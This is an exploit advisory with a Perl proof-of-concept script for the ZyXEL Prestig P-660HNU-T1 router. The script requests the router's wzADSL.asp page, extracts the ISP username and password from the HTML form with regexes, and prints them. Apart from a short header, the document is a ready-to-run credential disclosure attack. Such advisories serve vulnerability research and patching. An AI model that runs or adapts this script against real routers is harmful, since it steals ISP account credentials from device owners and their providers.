ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure

2014-09-24 21:05:06

# Exploit Author: Sebastián Magof
# Hardware: ZyXEL Prestig P-660HNU-T1
# Vulnerable file: wzADSL.asp
# location: http://gateway/cgi-bin/wzADSL.asp
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 22/09/2014
# Vendor Homepage: http://www.zyxel.com/
# Version: 2.00(AAIJ.1)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
print "\n\n************************************************************\n";
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";#in oher country modify $url line 25

#isp pwd disclosure file
my $url = "";

my $ua = LWP::UserAgent->new();

my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $pwd\n\n";



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